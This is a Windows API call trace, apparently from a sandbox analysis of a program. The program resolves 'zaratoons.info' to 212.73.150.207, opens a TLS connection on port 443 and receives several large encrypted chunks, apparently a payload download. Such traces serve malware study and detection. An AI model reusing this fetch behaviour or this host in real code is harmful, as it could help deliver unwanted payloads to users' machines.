	[0902.116] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3f4
	[0902.117] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x404
	[0902.118] ioctlsocket (in: s=0x3f4, cmd=-2147195266, argp=0x1c5bdd38 | out: argp=0x1c5bdd38) returned 0
	[0902.118] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x408
	[0902.118] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x40c
	[0902.118] ioctlsocket (in: s=0x408, cmd=-2147195266, argp=0x1c5bdd38 | out: argp=0x1c5bdd38) returned 0
	[0902.119] WSAIoctl (in: s=0x3f4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c5bdcb0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c5bdcb0, lpOverlapped=0x0) returned -1
	[0902.120] CoTaskMemAlloc (cb=0x204) returned 0x3442d0
	[0902.120] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3442d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.120] CoTaskMemFree (pv=0x3442d0) 
	[0902.121] WSAEventSelect (s=0x3f4, hEventObject=0x404, lNetworkEvents=512) returned 0
	[0902.121] WSAIoctl (in: s=0x408, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c5bdcb0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c5bdcb0, lpOverlapped=0x0) returned -1
	[0902.121] CoTaskMemAlloc (cb=0x204) returned 0x3442d0
	[0902.121] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3442d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.121] CoTaskMemFree (pv=0x3442d0) 
	[0902.121] WSAEventSelect (s=0x408, hEventObject=0x40c, lNetworkEvents=512) returned 0
	[0902.121] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x410
	[0902.122] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x410, param_3=0x3) returned 0x0
	[0902.147] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c5bddf0 | out: phkResult=0x1c5bddf0*=0x428) returned 0x0
	[0902.148] RegOpenKeyExW (in: hKey=0x428, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5bdcd8 | out: phkResult=0x1c5bdcd8*=0x42c) returned 0x0
	[0902.148] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430
	[0902.149] RegNotifyChangeKeyValue (hKey=0x42c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x430, fAsynchronous=1) returned 0x0
	[0902.150] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5bdd00 | out: phkResult=0x1c5bdd00*=0x434) returned 0x0
	[0902.150] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438
	[0902.150] RegNotifyChangeKeyValue (hKey=0x434, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x438, fAsynchronous=1) returned 0x0
	[0902.150] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5bdd00 | out: phkResult=0x1c5bdd00*=0x43c) returned 0x0
	[0902.150] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x440
	[0902.150] RegNotifyChangeKeyValue (hKey=0x43c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x440, fAsynchronous=1) returned 0x0
	[0902.150] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.150] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bdc68 | out: TokenHandle=0x1c5bdc68*=0x444) returned 1
	[0902.157] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.157] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd438 | out: TokenHandle=0x1c5bd438*=0x448) returned 1
	[0902.161] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.161] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd438 | out: TokenHandle=0x1c5bd438*=0x44c) returned 1
	[0902.438] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c5bdd38 | out: pProxyConfig=0x1c5bdd38) returned 1
	[0904.354] SetEvent (hEvent=0x354) returned 1
	[0904.984] GetCurrentProcess () returned 0xffffffffffffffff
	[0904.984] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd4a8 | out: TokenHandle=0x1c5bd4a8*=0x49c) returned 1
	[0904.987] GetCurrentProcess () returned 0xffffffffffffffff
	[0904.987] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd4a8 | out: TokenHandle=0x1c5bd4a8*=0x4a0) returned 1
	[0904.988] SetEvent (hEvent=0x354) returned 1
	[0905.482] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c5bd978 | out: pFixedInfo=0x0, pOutBufLen=0x1c5bd978) returned 0x6f
	[0905.745] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x2fa340
	[0905.745] GetNetworkParams (in: pFixedInfo=0x2fa340, pOutBufLen=0x1c5bd978 | out: pFixedInfo=0x2fa340, pOutBufLen=0x1c5bd978) returned 0x0
	[0905.801] CoTaskMemAlloc (cb=0xd) returned 0x1b717720
	[0905.801] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0905.801] CoTaskMemFree (pv=0x1b717720) 
	[0905.803] LocalFree (hMem=0x2fa340) returned 0x0
	[0905.828] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b4
	[0905.829] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b0
	[0905.831] CoTaskMemAlloc (cb=0x10) returned 0x1b717720
	[0905.833] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c5bd920*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c5bd918 | out: ppResult=0x1c5bd918*=0x1b72de60*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b717780*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0907.431] CoTaskMemFree (pv=0x1b717720) 
	[0907.431] CoTaskMemFree (pv=0x0) 
	[0907.432] FreeAddrInfoW (pAddrInfo=0x1b72de60*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b717780*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0907.433] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c4
	[0907.433] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4bc
	[0907.433] ioctlsocket (in: s=0x4c4, cmd=-2147195266, argp=0x1c5bd938 | out: argp=0x1c5bd938) returned 0
	[0907.433] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc
	[0907.434] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d0
	[0907.434] ioctlsocket (in: s=0x4cc, cmd=-2147195266, argp=0x1c5bd938 | out: argp=0x1c5bd938) returned 0
	[0907.434] WSAIoctl (in: s=0x4c4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c5bd8b0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c5bd8b0, lpOverlapped=0x0) returned -1
	[0907.434] CoTaskMemAlloc (cb=0x204) returned 0x344900
	[0907.434] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x344900, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.434] CoTaskMemFree (pv=0x344900) 
	[0907.434] WSAEventSelect (s=0x4c4, hEventObject=0x4bc, lNetworkEvents=512) returned 0
	[0907.434] WSAIoctl (in: s=0x4cc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c5bd8b0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c5bd8b0, lpOverlapped=0x0) returned -1
	[0907.434] CoTaskMemAlloc (cb=0x204) returned 0x344900
	[0907.434] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x344900, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.434] CoTaskMemFree (pv=0x344900) 
	[0907.434] WSAEventSelect (s=0x4cc, hEventObject=0x4d0, lNetworkEvents=512) returned 0
	[0907.436] GetAdaptersAddresses () returned 0x6f
	[0907.596] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b73a060
	[0907.596] GetAdaptersAddresses () returned 0x0
	[0907.621] LocalFree (hMem=0x1b73a060) returned 0x0
	[0907.624] WSAConnect (in: s=0x4b4, name=0x2f46f68*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0907.723] closesocket (s=0x4b0) returned 0
	[0907.949] EnumerateSecurityPackagesW (in: pcPackages=0x1c5bd798, ppPackageInfo=0x1c5bd790 | out: pcPackages=0x1c5bd798, ppPackageInfo=0x1c5bd790) returned 0x0
	[0907.952] lstrlenW (lpString="Negotiate") returned 9
	[0907.953] CoTaskMemAlloc (cb=0x16) returned 0x1b717760
	[0907.953] RtlMoveMemory (in: Destination=0x1b717760, Source=0x320b90, Length=0x14 | out: Destination=0x1b717760) 
	[0907.953] CoTaskMemFree (pv=0x1b717760) 
	[0907.953] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0907.953] CoTaskMemAlloc (cb=0x3c) returned 0x1b736400
	[0907.953] RtlMoveMemory (in: Destination=0x1b736400, Source=0x320ba4, Length=0x3a | out: Destination=0x1b736400) 
	[0907.953] CoTaskMemFree (pv=0x1b736400) 
	[0907.953] lstrlenW (lpString="NegoExtender") returned 12
	[0907.953] CoTaskMemAlloc (cb=0x1c) returned 0x1b71a080
	[0907.953] RtlMoveMemory (in: Destination=0x1b71a080, Source=0x320bde, Length=0x1a | out: Destination=0x1b71a080) 
	[0907.953] CoTaskMemFree (pv=0x1b71a080) 
	[0907.953] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0907.954] CoTaskMemAlloc (cb=0x3e) returned 0x1b736400
	[0907.954] RtlMoveMemory (in: Destination=0x1b736400, Source=0x320bf8, Length=0x3c | out: Destination=0x1b736400) 
	[0907.954] CoTaskMemFree (pv=0x1b736400) 
	[0907.954] lstrlenW (lpString="Kerberos") returned 8
	[0907.954] CoTaskMemAlloc (cb=0x14) returned 0x1b717760
	[0907.954] RtlMoveMemory (in: Destination=0x1b717760, Source=0x320c34, Length=0x12 | out: Destination=0x1b717760) 
	[0907.954] CoTaskMemFree (pv=0x1b717760) 
	[0907.954] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0907.954] CoTaskMemAlloc (cb=0x32) returned 0x1b72dee0
	[0907.954] RtlMoveMemory (in: Destination=0x1b72dee0, Source=0x320c46, Length=0x30 | out: Destination=0x1b72dee0) 
	[0907.954] CoTaskMemFree (pv=0x1b72dee0) 
	[0907.954] lstrlenW (lpString="NTLM") returned 4
	[0907.954] CoTaskMemAlloc (cb=0xc) returned 0x1b717760
	[0907.954] RtlMoveMemory (in: Destination=0x1b717760, Source=0x320c76, Length=0xa | out: Destination=0x1b717760) 
	[0907.954] CoTaskMemFree (pv=0x1b717760) 
	[0907.954] lstrlenW (lpString="NTLM Security Package") returned 21
	[0907.954] CoTaskMemAlloc (cb=0x2e) returned 0x1b72dee0
	[0907.954] RtlMoveMemory (in: Destination=0x1b72dee0, Source=0x320c80, Length=0x2c | out: Destination=0x1b72dee0) 
	[0907.954] CoTaskMemFree (pv=0x1b72dee0) 
	[0907.954] lstrlenW (lpString="Schannel") returned 8
	[0907.954] CoTaskMemAlloc (cb=0x14) returned 0x1b717760
	[0907.954] RtlMoveMemory (in: Destination=0x1b717760, Source=0x320cac, Length=0x12 | out: Destination=0x1b717760) 
	[0907.954] CoTaskMemFree (pv=0x1b717760) 
	[0907.954] lstrlenW (lpString="Schannel Security Package") returned 25
	[0907.954] CoTaskMemAlloc (cb=0x36) returned 0x1b72dee0
	[0907.954] RtlMoveMemory (in: Destination=0x1b72dee0, Source=0x320cbe, Length=0x34 | out: Destination=0x1b72dee0) 
	[0907.954] CoTaskMemFree (pv=0x1b72dee0) 
	[0907.954] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0907.954] CoTaskMemAlloc (cb=0x5c) returned 0x1b709bc0
	[0907.955] RtlMoveMemory (in: Destination=0x1b709bc0, Source=0x320cf2, Length=0x5a | out: Destination=0x1b709bc0) 
	[0907.955] CoTaskMemFree (pv=0x1b709bc0) 
	[0907.955] lstrlenW (lpString="Schannel Security Package") returned 25
	[0907.955] CoTaskMemAlloc (cb=0x36) returned 0x1b72dee0
	[0907.955] RtlMoveMemory (in: Destination=0x1b72dee0, Source=0x320d4c, Length=0x34 | out: Destination=0x1b72dee0) 
	[0907.955] CoTaskMemFree (pv=0x1b72dee0) 
	[0907.955] lstrlenW (lpString="WDigest") returned 7
	[0907.955] CoTaskMemAlloc (cb=0x12) returned 0x1b717760
	[0907.955] RtlMoveMemory (in: Destination=0x1b717760, Source=0x320d80, Length=0x10 | out: Destination=0x1b717760) 
	[0907.955] CoTaskMemFree (pv=0x1b717760) 
	[0907.955] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0907.955] CoTaskMemAlloc (cb=0x46) returned 0x1b736400
	[0907.955] RtlMoveMemory (in: Destination=0x1b736400, Source=0x320d90, Length=0x44 | out: Destination=0x1b736400) 
	[0907.955] CoTaskMemFree (pv=0x1b736400) 
	[0907.955] lstrlenW (lpString="TSSSP") returned 5
	[0907.955] CoTaskMemAlloc (cb=0xe) returned 0x1b717760
	[0907.955] RtlMoveMemory (in: Destination=0x1b717760, Source=0x320dd4, Length=0xc | out: Destination=0x1b717760) 
	[0907.955] CoTaskMemFree (pv=0x1b717760) 
	[0907.955] lstrlenW (lpString="TS Service Security Package") returned 27
	[0907.955] CoTaskMemAlloc (cb=0x3a) returned 0x1b736400
	[0907.955] RtlMoveMemory (in: Destination=0x1b736400, Source=0x320de0, Length=0x38 | out: Destination=0x1b736400) 
	[0907.955] CoTaskMemFree (pv=0x1b736400) 
	[0907.955] lstrlenW (lpString="pku2u") returned 5
	[0907.955] CoTaskMemAlloc (cb=0xe) returned 0x1b717760
	[0907.955] RtlMoveMemory (in: Destination=0x1b717760, Source=0x320e18, Length=0xc | out: Destination=0x1b717760) 
	[0907.955] CoTaskMemFree (pv=0x1b717760) 
	[0907.955] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0907.955] CoTaskMemAlloc (cb=0x30) returned 0x1b72dee0
	[0907.955] RtlMoveMemory (in: Destination=0x1b72dee0, Source=0x320e24, Length=0x2e | out: Destination=0x1b72dee0) 
	[0907.955] CoTaskMemFree (pv=0x1b72dee0) 
	[0907.955] lstrlenW (lpString="CREDSSP") returned 7
	[0907.955] CoTaskMemAlloc (cb=0x12) returned 0x1b717760
	[0907.955] RtlMoveMemory (in: Destination=0x1b717760, Source=0x320e52, Length=0x10 | out: Destination=0x1b717760) 
	[0907.956] CoTaskMemFree (pv=0x1b717760) 
	[0907.956] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0907.956] CoTaskMemAlloc (cb=0x4a) returned 0x1b735200
	[0907.956] RtlMoveMemory (in: Destination=0x1b735200, Source=0x320e62, Length=0x48 | out: Destination=0x1b735200) 
	[0907.956] CoTaskMemFree (pv=0x1b735200) 
	[0907.956] FreeContextBuffer (in: pvContextBuffer=0x320a50 | out: pvContextBuffer=0x320a50) returned 0x0
	[0907.962] GetCurrentProcess () returned 0xffffffffffffffff
	[0907.962] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd278 | out: TokenHandle=0x1c5bd278*=0x4b0) returned 1
	[0907.966] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2f4b120, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c5bd188, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c5bd178, ptsExpiry=0x1c5bd170 | out: phCredential=0x1c5bd178, ptsExpiry=0x1c5bd170) returned 0x0
	[0908.042] InitializeSecurityContextW (in: phCredential=0x1c5bd380, phContext=0x0, pTargetName=0x2f3fb88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c5bd370, pOutput=0x2f4d868, pfContextAttr=0x1c5bd368, ptsExpiry=0x1c5bd360 | out: phNewContext=0x1c5bd370, pOutput=0x2f4d868, pfContextAttr=0x1c5bd368, ptsExpiry=0x1c5bd360) returned 0x90312
	[0908.981] FreeContextBuffer (in: pvContextBuffer=0x1b7134c0 | out: pvContextBuffer=0x1b7134c0) returned 0x0
	[0908.988] send (s=0x4b4, buf=0x2f4d938*, len=118, flags=0) returned 118
	[0908.989] recv (in: s=0x4b4, buf=0x2f4d938, len=5, flags=0 | out: buf=0x2f4d938*) returned 5
	[0909.163] recv (in: s=0x4b4, buf=0x2f4d93d, len=93, flags=0 | out: buf=0x2f4d93d*) returned 93
	[0909.164] InitializeSecurityContextW (in: phCredential=0x1c5bd2a0, phContext=0x1c5bd550, pTargetName=0x2f3fb88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f4dc48, Reserved2=0x0, phNewContext=0x1c5bd290, pOutput=0x2f4dc68, pfContextAttr=0x1c5bd288, ptsExpiry=0x1c5bd280 | out: phNewContext=0x1c5bd290, pOutput=0x2f4dc68, pfContextAttr=0x1c5bd288, ptsExpiry=0x1c5bd280) returned 0x90312
	[0909.165] recv (in: s=0x4b4, buf=0x2f4dd58, len=5, flags=0 | out: buf=0x2f4dd58*) returned 5
	[0909.165] recv (in: s=0x4b4, buf=0x2f4dd7d, len=2556, flags=0 | out: buf=0x2f4dd7d*) returned 2556
	[0909.165] InitializeSecurityContextW (in: phCredential=0x1c5bd1d0, phContext=0x1c5bd480, pTargetName=0x2f3fb88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f4e850, Reserved2=0x0, phNewContext=0x1c5bd1c0, pOutput=0x2f4e870, pfContextAttr=0x1c5bd1b8, ptsExpiry=0x1c5bd1b0 | out: phNewContext=0x1c5bd1c0, pOutput=0x2f4e870, pfContextAttr=0x1c5bd1b8, ptsExpiry=0x1c5bd1b0) returned 0x90312
	[0909.177] recv (in: s=0x4b4, buf=0x2f4e960, len=5, flags=0 | out: buf=0x2f4e960*) returned 5
	[0909.177] recv (in: s=0x4b4, buf=0x2f4e985, len=331, flags=0 | out: buf=0x2f4e985*) returned 331
	[0909.177] InitializeSecurityContextW (in: phCredential=0x1c5bd100, phContext=0x1c5bd3b0, pTargetName=0x2f3fb88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f4eba0, Reserved2=0x0, phNewContext=0x1c5bd0f0, pOutput=0x2f4ebc0, pfContextAttr=0x1c5bd0e8, ptsExpiry=0x1c5bd0e0 | out: phNewContext=0x1c5bd0f0, pOutput=0x2f4ebc0, pfContextAttr=0x1c5bd0e8, ptsExpiry=0x1c5bd0e0) returned 0x90312
	[0909.178] recv (in: s=0x4b4, buf=0x2f4ecb0, len=5, flags=0 | out: buf=0x2f4ecb0*) returned 5
	[0909.178] recv (in: s=0x4b4, buf=0x2f4ecd5, len=4, flags=0 | out: buf=0x2f4ecd5*) returned 4
	[0909.179] InitializeSecurityContextW (in: phCredential=0x1c5bd030, phContext=0x1c5bd2e0, pTargetName=0x2f3fb88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f4edb0, Reserved2=0x0, phNewContext=0x1c5bd020, pOutput=0x2f4edd0, pfContextAttr=0x1c5bd018, ptsExpiry=0x1c5bd010 | out: phNewContext=0x1c5bd020, pOutput=0x2f4edd0, pfContextAttr=0x1c5bd018, ptsExpiry=0x1c5bd010) returned 0x90312
	[0909.187] FreeContextBuffer (in: pvContextBuffer=0x1b6f1370 | out: pvContextBuffer=0x1b6f1370) returned 0x0
	[0909.187] send (s=0x4b4, buf=0x2f4eea0*, len=134, flags=0) returned 134
	[0909.187] recv (in: s=0x4b4, buf=0x2f4eea0, len=5, flags=0 | out: buf=0x2f4eea0*) returned 5
	[0909.311] recv (in: s=0x4b4, buf=0x2f4eea5, len=1, flags=0 | out: buf=0x2f4eea5*) returned 1
	[0909.312] InitializeSecurityContextW (in: phCredential=0x1c5bcf60, phContext=0x1c5bd210, pTargetName=0x2f3fb88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f4f018, Reserved2=0x0, phNewContext=0x1c5bcf50, pOutput=0x2f4f038, pfContextAttr=0x1c5bcf48, ptsExpiry=0x1c5bcf40 | out: phNewContext=0x1c5bcf50, pOutput=0x2f4f038, pfContextAttr=0x1c5bcf48, ptsExpiry=0x1c5bcf40) returned 0x90312
	[0909.313] recv (in: s=0x4b4, buf=0x2f4f128, len=5, flags=0 | out: buf=0x2f4f128*) returned 5
	[0909.313] recv (in: s=0x4b4, buf=0x2f4f14d, len=48, flags=0 | out: buf=0x2f4f14d*) returned 48
	[0909.313] InitializeSecurityContextW (in: phCredential=0x1c5bce90, phContext=0x1c5bd140, pTargetName=0x2f3fb88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f4f250, Reserved2=0x0, phNewContext=0x1c5bce80, pOutput=0x2f4f270, pfContextAttr=0x1c5bce78, ptsExpiry=0x1c5bce70 | out: phNewContext=0x1c5bce80, pOutput=0x2f4f270, pfContextAttr=0x1c5bce78, ptsExpiry=0x1c5bce70) returned 0x0
	[0909.324] QueryContextAttributesW (in: phContext=0x1c5bd0f0, ulAttribute=0x4, pBuffer=0x2f4f388 | out: pBuffer=0x2f4f388) returned 0x0
	[0909.325] QueryContextAttributesW (in: phContext=0x1c5bd0f0, ulAttribute=0x5a, pBuffer=0x2f4f408 | out: pBuffer=0x2f4f408) returned 0x0
	[0909.332] QueryContextAttributesW (in: phContext=0x1c5bcfa0, ulAttribute=0x53, pBuffer=0x2f4f758 | out: pBuffer=0x2f4f758) returned 0x0
	[0909.338] CertDuplicateCRLContext (pCrlContext=0x1b710bb0) returned 0x1b710bb0
	[0909.340] CertDuplicateStore (hCertStore=0x2fcd80) returned 0x2fcd80
	[0909.341] CertEnumCertificatesInStore (hCertStore=0x2fcd80, pPrevCertContext=0x0) returned 0x1b710c30
	[0909.341] CertDuplicateCRLContext (pCrlContext=0x1b710c30) returned 0x1b710c30
	[0909.341] CertEnumCertificatesInStore (hCertStore=0x2fcd80, pPrevCertContext=0x1b710c30) returned 0x1b710bb0
	[0909.342] CertDuplicateCRLContext (pCrlContext=0x1b710bb0) returned 0x1b710bb0
	[0909.342] CertEnumCertificatesInStore (hCertStore=0x2fcd80, pPrevCertContext=0x1b710bb0) returned 0x0
	[0909.342] CertCloseStore (hCertStore=0x2fcd80, dwFlags=0x0) returned 1
	[0909.342] CertFreeCRLContext (pCrlContext=0x1b710bb0) returned 1
	[0909.348] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2fccb0
	[0909.348] CertAddCRLLinkToStore (in: hCertStore=0x2fccb0, pCrlContext=0x1b710c30, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.349] CertAddCRLLinkToStore (in: hCertStore=0x2fccb0, pCrlContext=0x1b710bb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.351] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b710bb0, pTime=0x1c5bcfa8, hAdditionalStore=0x2fccb0, pChainPara=0x1c5bcfb0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c5bcfa0 | out: ppChainContext=0x1c5bcfa0) returned 1
	[0911.510] CertDuplicateCertificateChain (pChainContext=0x1ccc07d0) returned 0x1ccc07d0
	[0911.512] CertDuplicateCRLContext (pCrlContext=0x1b710bb0) returned 0x1b710bb0
	[0911.512] CertDuplicateCRLContext (pCrlContext=0x1cd0c6a0) returned 0x1cd0c6a0
	[0911.512] CertDuplicateCRLContext (pCrlContext=0x1cd0c720) returned 0x1cd0c720
	[0911.513] CertFreeCertificateChain (pChainContext=0x1ccc07d0) 
	[0911.514] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ccc07d0, pPolicyPara=0x1c5bd128, pPolicyStatus=0x1c5bd108 | out: pPolicyStatus=0x1c5bd108) returned 1
	[0911.515] SetLastError (dwErrCode=0x0) 
	[0911.519] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ccc07d0, pPolicyPara=0x1c5bd200, pPolicyStatus=0x1c5bd1e8 | out: pPolicyStatus=0x1c5bd1e8) returned 1
	[0911.521] CertFreeCertificateChain (pChainContext=0x1ccc07d0) 
	[0911.521] CertFreeCRLContext (pCrlContext=0x1b710bb0) returned 1
	[0911.525] EncryptMessage (in: phContext=0x1c5bd7b0, fQOP=0x0, pMessage=0x2f51e88, MessageSeqNo=0x0 | out: pMessage=0x2f51e88) returned 0x0
	[0911.525] send (s=0x4b4, buf=0x2f51bc8*, len=117, flags=0) returned 117
	[0913.015] setsockopt (s=0x4b4, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0913.016] recv (in: s=0x4b4, buf=0x2f51fe8, len=5, flags=0 | out: buf=0x2f51fe8*) returned 5
	[0913.016] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 16416
	[0913.026] DecryptMessage (in: phContext=0x1c5bd370, pMessage=0x2f56140, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f56140, pfQOP=0x0) returned 0x0
	[0913.464] setsockopt (s=0x4b4, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0913.474] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0913.474] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 16416
	[0913.474] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f77750, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f77750, pfQOP=0x0) returned 0x0
	[0913.475] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0913.475] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 16416
	[0913.478] DecryptMessage (in: phContext=0x1c5bd940, pMessage=0x2f77990, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f77990, pfQOP=0x0) returned 0x0
	[0913.478] recv (in: s=0x4b4, buf=0x2f52008, len=5, flags=0 | out: buf=0x2f52008*) returned 5
	[0913.479] recv (in: s=0x4b4, buf=0x2f5200d, len=16416, flags=0 | out: buf=0x2f5200d*) returned 16416
